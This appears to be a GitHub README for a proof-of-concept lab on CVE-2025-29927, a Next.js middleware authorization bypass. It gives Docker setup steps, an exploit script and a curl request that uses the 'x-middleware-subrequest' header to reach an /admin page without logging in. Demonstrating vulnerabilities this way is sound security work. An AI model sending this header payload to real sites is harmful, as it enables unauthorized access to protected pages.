This repository demonstrates a critical vulnerability in Next.js middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for authorization bypass, CSP bypass, and potential DoS attacks through cache-poisoning. The issue originates in the way the x-middleware-subrequest header is handled, allowing attackers to bypass middleware protection mechanisms.
This proof of concept is specific for the vulnerability in v12
Set up the vulnerable environment using docker and the files from this repo by running:
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-appThis repository has the exploit.sh already created script to test the explotation of the vulnerability. Tu test it run:
chmod +x exploit.sh
./exploit.shAdditionally you can test the explotation of the vulnerability by trying the following
- Request the admin page without authentication. You should get a redirection to the
loginpage.
curl -i http://localhost:3000/admin- Request the page without authentication but using the
x-middleware-subrequestheader. You should be able to bypass the authentication page.
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin- CVE-2025-29927: Security Advisory Link